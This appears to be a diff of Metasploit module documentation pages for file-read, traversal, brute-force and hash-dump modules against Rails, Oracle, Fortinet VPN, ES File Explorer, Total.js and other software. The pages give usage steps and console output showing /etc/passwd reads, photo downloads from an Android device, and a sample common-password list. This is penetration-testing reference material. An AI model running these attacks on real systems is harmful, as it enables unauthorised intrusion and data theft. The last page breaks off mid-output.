+Special thanks to Steven Seeley to assist on the development of the Metasploit module.
+
+## Scenarios
+
+```
+msf5 auxiliary(gather/oats_downloadservlet_traversal) > run
+[*] Running module against 172.16.249.143
+
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
+<properties>
+<entry key="oracle.oats.cluster.agent.username">oats-agent</entry>
+<entry key="oracle.oats.security.keystore.info">eYAdfLaDkdBlUmflYhpg+CHGeXc=</entry>
+<entry key="oracle.oats.cluster.username">oats</entry>
+<entry key="oracle.oats.cluster.agent.password">{AES}WNdIPXpoeoZzyDNuJPm0wU4R3YKc1SUR2k5+TbQfzIQ=</entry>
+<entry key="oracle.oats.admin.username">oats</entry>
+<entry key="oracle.oats.http.url">http://localhost:8088</entry>
+<entry key="oracle.oats.config.version">9.1.0</entry>
+<entry key="oracle.oats.admin.password">{AES}NHrwlbPc7Arlb7puj+UlzAAXB/dUEbv3bdwNnee1/sc=</entry>
+<entry key="oracle.oats.cluster.password">{AES}WMTjMmLChdB9CTSrnyJ33113u0ml0juuGZQCWPODJTk=</entry>
+<entry key="oracle.oats.admin.url">t3://localhost:8088</entry>
+<entry key="oracle.oats.tmp.dir">/tmp</entry>
+<entry key="oracle.oats.cluster.url">t3://localhost:8088</entry>
+</properties>
+
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/oats_downloadservlet_traversal) > 
+```
@@ -0,0 +1,76 @@
+## Vulnerable Application
+
+  Ruby on Rails versions <= 5.2.2. The following example shows how to recreate the vulnerable environment on Linux:
+
+  https://chybeta.github.io/2019/03/16/Analysis-for%E3%80%90CVE-2019-5418%E3%80%91File-Content-Disclosure-on-Rails/
+
+## Verification Steps
+
+  1. Start a Rails server using a vulnerable version 
+  2. Start msfconsole
+  3. Do: ```use auxiliary/gather/rails_doubletap_file_read```
+  4. Do: ```set ROUTE /your_route```
+  5. Do: ```set RHOSTS target```
+  6. Do: ```set TARGET_FILE /absolute/path/to/remote/file.txt```
+  7. Do: ```run```
+  8. If everything goes smoothly, you should get the contents of the remote file printed to the console.
+
+
+## Options
+
+  **ROUTE**
+
+  This is a web path or "route" on the vulnerable server. Since the vulnerability lies within the PathResolver of Rails, the route should be in the server's routes.rb file. 
+
+  **TARGET_FILE**
+
+  This is the file to be read on the remote server. This *must* be an absolute path (eg. /etc/passwd).
+
+## Advanced Options
+
+  **SKIP_CHECK**
+  
+  This options skips the initial vulnerability check and continues thinking the server is vulnerable. 
+
+## Scenarios
+
+### Version of software and OS as applicable
+
+
+  ```
+msf5 > use auxiliary/gather/rails_doubletap_file_read
+msf5 auxiliary(gather/rails_doubletap_file_read) > options
+
+Module options (auxiliary/gather/rails_doubletap_file_read):
+
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                        yes       The target address range or CIDR identifier
+   ROUTE        /msf             yes       A route on the vulnerable server.
+   RPORT        80               yes       The target port (TCP)
+   SSL          false            no        Negotiate SSL/TLS for outgoing connections
+   TARGET_FILE  /etc/passwd      yes       The absolute path of remote file to read.
+   VHOST                         no        HTTP server virtual host
+
+msf5 auxiliary(gather/rails_doubletap_file_read) > set RHOSTS localhost
+RHOSTS => localhost
+msf5 auxiliary(gather/rails_doubletap_file_read) > set RPORT 8000
+RPORT => 8000
+smsf5 auxiliary(gather/rails_doubletap_file_read) > set ROUTE /demo
+ROUTE => /demo
+msf5 auxiliary(gather/rails_doubletap_file_read) > run
+[*] Running module against 127.0.0.1
+
+[+] Target is vulnerable!
+[*] Requesting file /etc/passwd
+[+] Response from server:
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+...snip...
+systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+postgres:x:105:112:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
+
+[*] Auxiliary module execution completed  
+```
@@ -0,0 +1,28 @@
+This module provides a port of Daniel Mende's (released under the BSD license) gtp-scan.py utility. It brings the ability to scan for GPRS servers to Metasploit via sending GTP-U v1 and v2 echo requests.
+
+## Vulnerable Application
+
+Open-source GGSN implementations can be used as a target for this module as well as commercial GPRS gear. For information on one project suitable as a target, see [OsmoGGSN](https://osmocom.org/projects/openggsn/wiki/OsmoGGSN).
+
+## Options
+
+   **The RPORT option**
+
+   This option can be changed to target GTP-U (2152) or GTP-C (2123), which both use the same packet type for echo probing.
+
+## Scenarios
+
+```
+metasploit-framework (S:0 J:1) auxiliary(scanner/gprs/gtp_echo) > set RHOSTS 192.168.28.200-192.168.28.208
+RHOSTS => 192.168.28.200-192.168.28.208
+metasploit-framework (S:0 J:1) auxiliary(scanner/gprs/gtp_echo) > run
+
+[*] [2019.04.22-16:38:27] Sending probes to 192.168.28.200->192.168.28.208 (9 hosts)
+[+] [2019.04.22-16:38:42] GTP v1 echo response received from: 192.168.28.200:2152
+[+] [2019.04.22-16:38:43] GTP v1 echo response received from: 192.168.28.201:2152
+[+] [2019.04.22-16:38:43] GTP v1 echo response received from: 192.168.28.207:2152
+[+] [2019.04.22-16:38:43] GTP v1 echo response received from: 192.168.28.208:2152
+[*] [2019.04.22-16:38:43] Scanned 9 of 9 hosts (100% complete)
+[*] Auxiliary module execution completed
+metasploit-framework (S:0 J:1) auxiliary(scanner/gprs/gtp_echo) >
+```
@@ -0,0 +1,263 @@
+## Vulnerable Application
+
+  ES File Explorer has an HTTP server that runs and accepts 
+  certain commands. The HTTP server is started on app launch, and is 
+  available as long as the app is open. ES File Explorer launches as
+  a service in the background on device boot. Version 4.1.9.7.4 and below 
+  are reported vulnerable. This module has been tested against 
+  [4.1.9.5.1](https://www.apkmirror.com/apk/es-global/es-file-explorer/es-file-explorer-4-1-9-5-1-release/).
+
+  This module includes all functionality from the original [POC](https://github.com/fs0c131y/ESFileExplorerOpenPortVuln)
+  except for the `getAppThumbnail` command.
+
+  Available actions:
+
+ *  **APPLAUNCH**       Launch an app. ACTIONITEM required.
+ *  **GETDEVICEINFO**   Get device info
+ *  **GETFILE**         Get a file from the device. ACTIONITEM required.
+ *  **LISTAPPS**        List all the apps installed
+ *  **LISTAPPSALL**     List all the apps installed
+ *  **LISTAPPSPHONE**   List all the phone apps installed
+ *  **LISTAPPSSDCARD**  List all the apk files stored on the sdcard
+ *  **LISTAPPSSYSTEM**  List all the system apps installed
+ *  **LISTAUDIOS**      List all the audio files
+ *  **LISTFILES**       List all the files on the sdcard
+ *  **LISTPICS**        List all the pictures
+ *  **LISTVIDEOS**      List all the videos
+
+  Not all of the information from the commands is printed to screen, however the origin JSON
+  content is stored in loot for reference.
+
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use modules/auxiliary/scanner/http/es_file_explorer_open_port```
+  4. Do: ```run```
+  5. You should get device information
+
+## Options
+
+  **ACTION**
+
+  The action to perform.  See description in Vulnerable Application section for additional details.  Default is `GETDEVICEINFO`.
+
+  **ACTIONITEM**
+
+  If running `APPLAUNCH` or `GETFILE`, this is the app to launch or file to download.
+
+## Scenarios
+
+### ES File Explorer 4.1.9.5.1 on a Dragon Touch Y88X on Android 4.4
+
+```
+resource (es.rb)> use modules/auxiliary/scanner/http/es_file_explorer_open_port
+resource (es.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (es.rb)> set action GETDEVICEINFO
+action => GETDEVICEINFO
+resource (es.rb)> run
+[+] 1.1.1.1:59777  - Name: Y88X
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTFILES
+action => LISTFILES
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+  folder: bootloader (0.00 Bytes) - 3/23/2019 10:36:51 AM
+  folder: databk (0.00 Bytes) - 3/23/2019 10:36:49 AM
+  folder: sdcard (4.00 KB) - 3/23/2019 02:15:24 PM
+  folder: storage (0.00 Bytes) - 3/23/2019 10:36:49 AM
+  folder: config (0.00 Bytes) - 3/23/2019 10:36:49 AM
+  folder: cache (4.00 KB) - 3/24/2019 07:37:46 AM
+  folder: acct (0.00 Bytes) - 3/23/2019 10:36:49 AM
+  folder: vendor (4.00 KB) - 1/31/2015 05:56:49 AM
+  folder: d (0.00 Bytes) - 12/31/1969 07:00:00 PM
+  folder: etc (4.00 KB) - 2/3/2015 03:51:06 AM
+  folder: mnt (0.00 Bytes) - 3/23/2019 10:36:49 AM
+  file: ueventd.sun8i.rc (1.18 KB) - 12/31/1969 07:00:00 PM
+  file: ueventd.rc (3.93 KB) - 12/31/1969 07:00:00 PM
+  folder: system (4.00 KB) - 12/31/1969 07:00:00 PM
+  folder: sys (0.00 Bytes) - 3/23/2019 10:36:45 AM
+  file: sepolicy (73.82 KB) - 12/31/1969 07:00:00 PM
+  file: seapp_contexts (656.00 Bytes) - 12/31/1969 07:00:00 PM
+  folder: sbin (0.00 Bytes) - 12/31/1969 07:00:00 PM
+  folder: res (0.00 Bytes) - 12/31/1969 07:00:00 PM
+  file: property_contexts (2.11 KB) - 12/31/1969 07:00:00 PM
+  folder: proc (0.00 Bytes) - 12/31/1969 07:00:00 PM
+  file: nand.ko (1.47 MB) - 12/31/1969 07:00:00 PM
+  file: initlogo.rle (2.34 MB) - 12/31/1969 07:00:00 PM
+  file: init.usb.rc (3.82 KB) - 12/31/1969 07:00:00 PM
+  file: init.trace.rc (1.75 KB) - 12/31/1969 07:00:00 PM
+  file: init.sunxi.wifi.bt.rc (1010.00 Bytes) - 12/31/1969 07:00:00 PM
+  file: init.sun8i.usb.rc (3.40 KB) - 12/31/1969 07:00:00 PM
+  file: init.sun8i.rc (4.67 KB) - 12/31/1969 07:00:00 PM
+  file: init.recovery.sun8i.rc (97.00 Bytes) - 12/31/1969 07:00:00 PM
+  file: init.rc (23.12 KB) - 12/31/1969 07:00:00 PM
+  file: init.environ.rc (919.00 Bytes) - 12/31/1969 07:00:00 PM
+  file: init (183.40 KB) - 12/31/1969 07:00:00 PM
+  file: fstab.sun8i (1.64 KB) - 12/31/1969 07:00:00 PM
+  file: file_contexts (9.03 KB) - 12/31/1969 07:00:00 PM
+  file: default.prop (116.00 Bytes) - 12/31/1969 07:00:00 PM
+  folder: data (4.00 KB) - 3/23/2019 10:36:52 AM
+  file: charger (274.11 KB) - 12/31/1969 07:00:00 PM
+  folder: root (0.00 Bytes) - 1/31/2015 05:24:35 AM
+  folder: dev (2.62 KB) - 3/23/2019 10:37:14 AM
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTVIDEOS
+action => LISTVIDEOS
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+  DragonTouch-text.mp4 (55.30 MB) - 1/20/1970 10:18:53 PM: /storage/emulated/0/Movies/DragonTouch-text.mp4
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTAUDIOS
+action => LISTAUDIOS
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+  Calendar Notification.ogg (52.89 KB) - 8/6/2015 08:15:30 PM: /storage/emulated/0/Notifications/Calendar Notification.ogg
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTAPPSSYSTEM
+action => LISTAPPSSYSTEM
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+  Package Access Helper (com.android.defcontainer) Version: 4.4.2-20150203
+  Launcher (com.android.launcher) Version: 4.4.2-20150203
+  Contacts (com.android.contacts) Version: 4.4.2-20150203
+  com.android.providers.partnerbookmarks (com.android.providers.partnerbookmarks) Version: 4.4.2-20150203
+```
+...snip...
+
+```
+  Chrome (com.android.chrome) Version: 67.0.3396.87
+  Shell (com.android.shell) Version: 4.4.2-20150203
+  Google Contacts Sync (com.google.android.syncadapters.contacts) Version: 4.4.2-940549
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTAPPSPHONE
+action => LISTAPPSPHONE
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+  Package Access Helper (com.android.defcontainer) Version: 4.4.2-20150203
+  Launcher (com.android.launcher) Version: 4.4.2-20150203
+  Contacts (com.android.contacts) Version: 4.4.2-20150203
+  com.android.providers.partnerbookmarks (com.android.providers.partnerbookmarks) Version: 4.4.2-20150203
+  Mobile Data (com.android.phone) Version: 4.4.2-20150203
+  Calculator (com.android.calculator2) Version: 4.4.2-20150203
+```
+...snip...
+
+```
+  Calendar (com.google.android.calendar) Version: 5.8.28-195646716-release
+  Face Unlock (com.android.facelock) Version: 4.4.2-940549
+  Chrome (com.android.chrome) Version: 67.0.3396.87
+  Shell (com.android.shell) Version: 4.4.2-20150203
+  Google Contacts Sync (com.google.android.syncadapters.contacts) Version: 4.4.2-940549
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTAPPSSDCARD
+action => LISTAPPSSDCARD
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTAPPSALL
+action => LISTAPPSALL
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+  Package Access Helper (com.android.defcontainer) Version: 4.4.2-20150203
+  Launcher (com.android.launcher) Version: 4.4.2-20150203
+  Contacts (com.android.contacts) Version: 4.4.2-20150203
+```
+...snip...
+
+```
+  com.android.keyguard (com.android.keyguard) Version: 4.4.2-20150203
+  Calendar (com.google.android.calendar) Version: 5.8.28-195646716-release
+  Face Unlock (com.android.facelock) Version: 4.4.2-940549
+  Chrome (com.android.chrome) Version: 67.0.3396.87
+  Shell (com.android.shell) Version: 4.4.2-20150203
+  Google Contacts Sync (com.google.android.syncadapters.contacts) Version: 4.4.2-940549
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTPICS
+action => LISTPICS
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+  IMG_20190323_165608.jpg (140.06 KB) - 3/23/2019 04:56:08 PM: /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action GETFILE
+action => GETFILE
+resource (es.rb)> set actionitem /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg
+actionitem => /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg
+resource (es.rb)> run
+[+] 1.1.1.1:59777  - /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg saved to /root/.msf4/loot/20190324073855_default_1.1.1.1_getFile_670725.jpg
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTAPPS
+action => LISTAPPS
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+  TalkBack (com.google.android.marvin.talkback) Version: 5.0.7
+  Google Play services (com.google.android.gms) Version: 12.6.85 (000302-197041431)
+  Phone (com.andriod.phone) Version: 1.0
+  Google Play Music (com.google.android.music) Version: 8.12.7210-1.F
+  Google Text-to-speech Engine (com.google.android.tts) Version: 3.15.18.200023596
+  Cloud Print (com.google.android.apps.cloudprint) Version: 1.40
+  com.softwinner.videotest (com.softwinner.videotest) Version: 1.0
+  APUS (com.apusapps.launcher) Version: 2.3.1
+  Settings (com.android.system.io.settings) Version: 11.1.0
+  DragonPhone (com.softwinner.dragonphone) Version: 1.0
+  com.mediatek.touch (com.mediatek.touch) Version: 21_zh80001
+  Google Play Store (com.android.vending) Version: 13.9.17-all [0] [PR] 236777123
+  com.android.google.settings (com.android.google.settings) Version: 17_zh10317
+  MainActivity (com.metasploit.stage) Version: 1.0
+  Gmail (com.google.android.gm) Version: 8.6.3.200445973.release
+  L-Uninstall (com.clear.uninstall) Version: 2.0
+  ES File Explorer (com.estrongs.android.pop) Version: 4.1.9.5.1
+  DragonFire-v2.3 (com.softwinner.dragonfire) Version: 2.3 release
+  YouTube (com.google.android.youtube) Version: 13.23.59
+  Calendar (com.google.android.calendar) Version: 5.8.28-195646716-release
+  Chrome (com.android.chrome) Version: 67.0.3396.87
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action APPLAUNCH
+action => APPLAUNCH
+resource (es.rb)> set actionitem com.android.chrome
+actionitem => com.android.chrome
+resource (es.rb)> run
+[+] 1.1.1.1:59777  - com.android.chrome launched successfully
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> loot
+
+Loot
+====
+
+host           service  type                 name                                                     content                   info  path
+----           -------  ----                 ----                                                     -------                   ----  ----
+1.1.1.1        getDeviceInfo.json   es_file_explorer_getdeviceinfo.json                      application/json                /root/.msf4/loot/20190324073803_default_1.1.1.1_getDeviceInfo.js_744272.bin
+1.1.1.1        listFiles.json       es_file_explorer_listfiles.json                          application/json                /root/.msf4/loot/20190324073803_default_1.1.1.1_listFiles.json_522563.bin
+1.1.1.1        listVideos.json      es_file_explorer_listvideos.json                         application/json                /root/.msf4/loot/20190324073803_default_1.1.1.1_listVideos.json_623335.bin
+1.1.1.1        listAudio.json       es_file_explorer_listaudio.json                          application/json                /root/.msf4/loot/20190324073803_default_1.1.1.1_listAudio.json_331531.bin
+1.1.1.1        listAppsSystem.json  es_file_explorer_listappssystem.json                     application/json                /root/.msf4/loot/20190324073821_default_1.1.1.1_listAppsSystem.j_581712.bin
+1.1.1.1        listAppsPhone.json   es_file_explorer_listappsphone.json                      application/json                /root/.msf4/loot/20190324073838_default_1.1.1.1_listAppsPhone.js_773512.bin
+1.1.1.1        listAppsSdcard.json  es_file_explorer_listappssdcard.json                     application/json                /root/.msf4/loot/20190324073838_default_1.1.1.1_listAppsSdcard.j_543396.bin
+1.1.1.1        listAppsAll.json     es_file_explorer_listappsall.json                        application/json                /root/.msf4/loot/20190324073854_default_1.1.1.1_listAppsAll.json_886297.bin
+1.1.1.1        listPics.json        es_file_explorer_listpics.json                           application/json                /root/.msf4/loot/20190324073855_default_1.1.1.1_listPics.json_831055.bin
+1.1.1.1        getFile              /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg  application/octet-stream        /root/.msf4/loot/20190324073855_default_1.1.1.1_getFile_670725.jpg
+1.1.1.1        listApps.json        es_file_explorer_listapps.json                           application/json                /root/.msf4/loot/20190324073856_default_1.1.1.1_listApps.json_189709.bin
+```
@@ -0,0 +1,40 @@
+This module tests credentials on Fortinet SSL VPN servers (FortiGate).
+
+NOTE: This module is only executing when Fortinet SSL VPN Server is detected.
+When the server cannot be verified the module stops working.
+The realm/domain is used for every request when set.
+
+The module supports IPv6 requests.
+The module supports several hosts at the same time.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/fortinet_ssl_vpn```
+2. Do: ```set RHOSTS [IP]```
+3. Configure a user and password list by setting either `USERNAME`, `PASSWORD`, `USER_FILE`, or `PASS_FILE`.
+4. Do: ```run```
+
+## Scenarios
+
+IP-Addresses have been masked with x
+
+```
+msf5 auxiliary(scanner/http/fortinet_ssl_vpn) > run
+
+[+] xxxx:xxxx:xxxx:xxxx::4:443 - Server is responsive...
+[+] xxxx:xxxx:xxxx:xxxx::4:443 - Application appears to be Fortinet SSL VPN. Module will continue.
+[*] xxxx:xxxx:xxxx:xxxx::4:443 - Starting login brute force...
+[*] xxxx:xxxx:xxxx:xxxx::4:443 - [1/1] - Trying username:"testuser" with password:"superpass"
+[+] SUCCESSFUL LOGIN - "testuser":"superpass"
+[!] No active DB -- Credential data will not be saved!
+[*] Scanned 1 of 2 hosts (50% complete)
+[+] xxx.xxx.xxx.xxx:443 - [1/1] - Server is responsive...
+[+] xxx.xxx.xxx.xxx:443 - [1/1] - Application appears to be Fortinet SSL VPN. Module will continue.
+[*] xxx.xxx.xxx.xxx:443 - [1/1] - Starting login brute force...
+[*] xxx.xxx.xxx.xxx:443 - [1/1] - Trying username:"testuser" with password:"superpass"
+[+] SUCCESSFUL LOGIN - "testuser":"superpass"
+[!] No active DB -- Credential data will not be saved!
+[*] Scanned 2 of 2 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+```
@@ -0,0 +1,72 @@
+## Description
+The onion_omega2_login module is used to brute-force credentials for Onion Omage2 devices.
+
+## Vulnerable Application
+* Onion Omage2 HTTPd Service
+
+![Onion Omega2](https://raw.githubusercontent.com/OnionIoT/Onion-Docs/master/Omega2/Documentation/Get-Started/img/unbox-6-omega-led-detail.jpg)
+
+![Onion Omega2 OnionOS Web Page](https://i.imgur.com/nrHnQaW.png)
+
+## Verification Steps
+1. Plug your Onion Omega2 device to a power source. 
+    - First time setup can be found [here](https://docs.onion.io/omega2-docs/first-time-setup.html)
+2. Connect to its Wi-Fi network.
+3. Start `msfconsole`
+4. Do: `use auxiliary/scanner/http/onion_omega2_login`
+5. Do: `set RHOSTS 192.168.3.1`
+6. Do: `set USERPASS_FILE <user pass dictionary>`
+    - username and password seperated by space and one pair per line.
+7. Do: `run`
+
+Sample userpass file:
+```text
+root 123456
+root password
+root 123456789
+root 12345678
+root 12345
+root 10601
+root qwerty
+root 123123
+root 111111
+root abc123
+root 1234567
+root dragon
+root 1q2w3e4r
+root sunshine
+root 654321
+root master
+```
+
+## Scenario 
+```
+msf5 > use auxiliary/scanner/http/onion_omega2_login
+msf5 auxiliary(scanner/http/onion_omega2_login) > set RHOSTS 192.168.3.1
+RHOSTS => 192.168.3.1
+msf5 auxiliary(scanner/http/onion_omega2_login) > set USERPASS_FILE something.txt
+USERPASS_FILE => something.txt
+msf5 auxiliary(scanner/http/onion_omega2_login) > run
+
+[*] Running for 192.168.3.1...
+[*] 192.168.3.1:80 - [ 1/16] - root:123456 - Failure
+[!] No active DB -- Credential data will not be saved!
+[*] 192.168.3.1:80 - [ 2/16] - root:password - Failure
+[*] 192.168.3.1:80 - [ 3/16] - root:123456789 - Failure
+[*] 192.168.3.1:80 - [ 4/16] - root:12345678 - Failure
+[*] 192.168.3.1:80 - [ 5/16] - root:12345 - Failure
+[+] Ubus RPC Session: 403e133730879d23a2a0df022e19c19c
+[+] 192.168.3.1:80 - [ 6/16] - root:10601 - Success
+[*] 192.168.3.1:80 - [ 7/16] - root:qwerty - Failure
+[*] 192.168.3.1:80 - [ 8/16] - root:123123 - Failure
+[*] 192.168.3.1:80 - [ 9/16] - root:111111 - Failure
+[*] 192.168.3.1:80 - [10/16] - root:abc123 - Failure
+[*] 192.168.3.1:80 - [11/16] - root:1234567 - Failure
+[*] 192.168.3.1:80 - [12/16] - root:dragon - Failure
+[*] 192.168.3.1:80 - [13/16] - root:1q2w3e4r - Failure
+[*] 192.168.3.1:80 - [14/16] - root:sunshine - Failure
+[*] 192.168.3.1:80 - [15/16] - root:654321 - Failure
+[*] 192.168.3.1:80 - [16/16] - root:master - Failure
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,35 @@
+## Description
+
+This module exploits an unauthenticated directory traversal vulnerability, which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6.
+Spring Cloud Config listens by default on port 8888.
+
+### Vulnerable Application
+
+* https://github.com/spring-cloud/spring-cloud-config/archive/v2.1.1.RELEASE.zip
+
+## Verification
+
+1. `./msfconsole`
+2. `use auxiliary/scanner/http/springcloud_traversal`
+3. `set rhosts <rhost>`
+4. `run`
+
+## Scenarios
+
+### Tested against Linux zero 4.15.0-48-generic #51-Ubuntu SMP x86_64 GNU/Linux
+
+```
+msf > use auxiliary/scanner/http/springcloud_traversal 
+msf auxiliary(scanner/http/springcloud_traversal) > set RHOSTS 192.168.1.132
+RHOSTS => 192.168.1.132
+msf auxiliary(scanner/http/springcloud_traversal) > run
+
+[+] File saved in: /home/input0/.msf4/loot/20190418203756_default_192.168.1.132_springcloud.trav_893434.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/http/springcloud_traversal) >
+```
+
+## References
+
+* https://pivotal.io/security/cve-2019-3799
@@ -0,0 +1,60 @@
+## Description
+
+This module check and exploits a Directory Traversal vulnerability in Total.js framework < 3.2.4 (CVE-2019-8903). Here is a list of accepted extensions: flac, jpg, jpeg, png, gif, ico, js, css, txt, xml, woff, woff2, otf, ttf, eot, svg, zip, rar, pdf, docx, xlsx, doc, xls, html, htm, appcache, manifest, map, ogv, ogg, mp4, mp3, webp, webm, swf, package, json, md, m4v, jsx, heif, heic.
+
+## Vulnerable Application
+
+Affecting total.js package, versions:
+
+* >=2.1.0 <2.1.1
+* >=2.2.0 <2.2.1
+* >=2.3.0 <2.3.1
+* >=2.4.0 <2.4.1
+* >=2.5.0 <2.5.1
+* >=2.6.0 <2.6.3
+* >=2.7.0 <2.7.1
+* >=2.8.0 <2.8.1
+* >=2.9.0 <2.9.5
+* >=3.0.0 <3.0.1
+* >=3.1.0 <3.1.1
+* >=3.2.0 <3.2.4
+
+## Verification Steps
+
+1. On a Node v8 environment do: `npm install total.js@3.2.3`
+2. Install an app on top of the Total.js framework, something like [Total.js CMS](https://github.com/totaljs/cms)
+  * `git clone https://github.com/totaljs/cms.git`
+  * `cd cms && npm install`
+3. Start `msfconsole`
+4. `use auxiliary/scanner/http/totaljs_traversal`
+5. `set RHOST <IP>`
+6. `set RPORT <PORT>`
+7. `run`
+8. Verify you get Total.js version if the target is vulnerable!
+
+## Options
+
+* **TARGETURI**: Path to Total.js App installation (“/” is the default)
+* **DEPTH**: Traversal depth (“1” is the default)
+* **FILE**: File to obtain (“databases/settings.json” is the default for Total.js CMS App)
+
+## Scenario
+
+### Tested on Total.js framework 3.2.0 and Total.js CMS 12.0.0
+
+```
+msf5 > use auxiliary/scanner/http/totaljs_traversal 
+msf5 auxiliary(scanner/http/totaljs_traversal) > set RHOST 192.168.2.59
+RHOST => 192.168.2.59
+msf5 auxiliary(scanner/http/totaljs_traversal) > set RPORT 8320
+RPORT => 8320
+msf5 auxiliary(scanner/http/totaljs_traversal) > run
+[*] Running module against 192.168.2.59
+
+[*] Total.js version is: ^3.2.0
+[*] App name: CMS
+[*] App description: A simple and powerful CMS solution written in Total.js / Node.js.
+[*] App version: 12.0.0
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/totaljs_traversal) >
+```
@@ -0,0 +1,173 @@
+## Preparation: 6 steps
+
+  1. Oracle DB XE (Express Edition) can be downloaded for free [here](https://www.oracle.com/technetwork/database/database-technologies/express-edition/downloads/index.html).
+  2. Install Oracle Database and create a database. Versions 8i through 12c are supported.
+  3. On your Oracle DB machine, make sure you can ping the DB server using the `tnsping [SID]` command. If `tnsping` is not in your path upon installation, you will have to locate it manually.
+     * On a Windows machine, for Oracle 11g, `tnsping.exe` is located at: `oracle_install\app\oracle\product\<version, ie 11.2.0)\server\bin\tnsping.exe`.
+     * On a Windows machine, for Oracle 12c and 18c, it is located at `%ORACLE_HOME%\bin\tnsping.exe`.
+
+     After this command is run, if all is well, the output will look something like this (note the OK echoed at the end):
+
+    ```
+    C:> tnsping staticdb
+    ...
+    
+    Used TNSNAMES adapter to resolve the alias
+    Attempting to contact (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = localhost)(PORT = 1521)) (CONNECT_DATA = (SERVER = DEDICATED) (SERVICE_NAME = staticdb)))
+    OK (0 msec)
+    ```
+
+    If `tnsping` fails, make sure the listener is setup correctly.
+    See [this Oracle doc](https://docs.oracle.com/cd/E11882_01/network.112/e41945/listenercfg.htm#NETAG294) for more information about its configuration. 
+
+  4. Make sure to create a user on the DB that has a known password, and sufficient privileges to select any table. This is necessary for getting the hashes.
+  5. Test that the module's hash query works locally. Once your user is created with sufficient privileges, connect to the DB as the user, and proceed to run the following query
+    * 12c: `SELECT name, spare4 FROM sys.user$ where password is not null and name <> \'ANONYMOUS\'`
+    * pre-12c: `SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\'`
+  6. Set up your MSF environment to support Oracle. You need gem ruby-oci8, as well as Oracle Instant Client.
+     [View the setup tutorial here](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux)
+  7. Make sure you have a database connected to MSF (postgresql). This can be done through `msfdb` tool or through `db_connect` command in `msfconsole`.
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: ```use auxiliary/scanner/oracle/oracle_hashdump.rb```
+  3. Do: ```run```
+  4. If Oracle DB version is supported, the query will be attempted to get the hashes. Hash table is built and then saved as credentials.
+  5. You may view saved credentials with `creds` command. These are used for cracking by module `jtr_oracle_fast`.
+
+## Options
+
+  **DBPASS**
+  The password to authenticate with. Change this from TIGER to the password of the privileged user created in step 4 of Preparation.
+
+  **DBUSER**
+  The username to authenticate with. Change this from SCOTT to the user you created who is granted privileges to select from the sys.user$ table
+
+  **RPORT**
+  The TNS port of the Oracle DB server. By default, Oracle uses port 1521. Double-check the port of your Oracle DB.
+
+  **SID**
+  The Service ID (of the database) to authenticate with. Change this to your SID (if you changed the SID from default upon installation).
+  Default is `ORCL` (default Oracle install value) or `XE` for free edition.
+
+## Scenarios
+
+### Running Oracle 12c on a local Windows 10 machine, and MSF5 on Ubuntu for Windows (same machine)
+
+```
+msf5 auxiliary(scanner/oracle/oracle_hashdump) > show options
+Module options (auxiliary/scanner/oracle/oracle_hashdump):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
